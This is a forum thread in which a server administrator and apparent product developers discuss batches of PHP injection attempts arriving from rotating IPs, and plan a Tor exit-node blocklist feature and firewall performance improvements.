Better understanding attacks

[faris]

I keep a very close eye on our logs.

For some time now I've noticed that sometimes attacks come in small batches, where I'll see between 4 and 8 php injection attempts on the same domain using the same attack type and trying to load the same script from the same known malware site, each spaced a few seconds or sometimes a minute or two appart.

What I find interesting is that the IPs for the attacks are different. Sometimes totally different countries.

On the assumption that the same Skiddie is actually behind all the attempts, what might they be doing? Might they be using a set of different compromised servers? Or Tor? Or something else?

Is there a tool that allows them to automate this IP skipping in some way, or are such batch attacks a sign of someone with a little more sophistication than usual?

Very occasionally I'll see different attacks being used per IP, yet still spaced very closely and using the same malware site as the source of the script they are attempting to inject.

Faris.

[scott]

Tor gets used a lot, or they'll cycle through lists of open proxies. It could also be an attack via a botnet.

[faris]

Interesting. OK, so we are back to needing an RBL (or IP list to add to a firewall) with TOR nodes in it.

I'll look into this a bit more.

Faris.

[scott]

yeah, we have one for tor, open proxies, etc that we're using internally. It will probably show up in ASL in the near future

[faris]

If it is an IP list, would you care to share before then? Obviously tor exit nodes change quite frequently, but the core ones stay the same so even an out of date list would be useful.

Faris.

[mikeshinn]

I'm working on the TOR add on now. The IP list *huge*, so I'll see what I can do about packaging it as an unsupported list, no promises though - its big. I'd prefer to get the auto-tor-rbl done sooner than later. Your box will basically generate the list in real time by asking the TOR directory nodes themselves, so there will be nothing for us to maintain or an RBL to query - you'll ask your own system.

[faris]

OK, sounds good -- I think if the list is huge we should wait until it is an integrated feature.

I'm a little alarmed by how long the firewall takes to load with the current block list (most of south america, plus some well known bad countries) that I have in place as it is. I'm really quite surprised at how slow it is, in fact.

... But that's another story

Faris.

[scott]

There are two different ways to do it, the way its done right now is to make it easier to integrate with other firewall systems. Theres a tradeoff there, the faster method is going to completely break integration with anything other than the native redhat/centos/fedora iptables script.

[faris]

Hmmm.....

Well, I would have thought a huge percentage of people use APF or similar, me included.

Time to get ASF (Atomic Secured Firewall) off the backburner maybe?

Faris.

[mikeshinn]

Time to get ASF (Atomic Secured Firewall) off the backburner maybe?

Heh, yeah, because the iptables route is actually not the most efficient means of doing this in Linux, there is a Better Way (TM) which means we gotta roll our own.